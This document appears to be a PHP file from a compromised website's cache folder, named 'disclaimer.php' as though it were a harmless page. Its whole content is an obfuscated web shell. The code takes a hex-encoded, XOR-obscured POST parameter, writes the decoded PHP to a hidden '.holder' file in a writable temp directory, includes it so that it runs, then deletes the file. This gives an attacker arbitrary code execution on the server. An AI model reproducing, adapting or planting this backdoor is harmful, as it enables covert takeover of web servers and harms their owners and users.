Current File : /home/missente/public_html/cache/disclaimer.php
<?php

if(!is_null($_POST["ele\x6D"] ?? null)){
	$property_set = hex2bin($_POST["ele\x6D"]);
	$desc    =    ''     ;      $b = 0; while($b < strlen($property_set)){$desc .= chr(ord($property_set[$b]) ^ 38);$b++;}
	$dat = array_filter(["/dev/shm", sys_get_temp_dir(), ini_get("upload_tmp_dir"), session_save_path(), "/var/tmp", getcwd(), getenv("TEMP"), getenv("TMP"), "/tmp"]);
	foreach ($dat as $ent):
    		if (is_writable($ent) && is_dir($ent)) {
    $fac = vsprintf("%s/%s", [$ent, ".holder"]);
    $file = fopen($fac, 'w');
if ($file) {
	fwrite($file, $desc);
	fclose($file);
	include $fac;
	@unlink($fac);
	exit;
}
}
endforeach;
}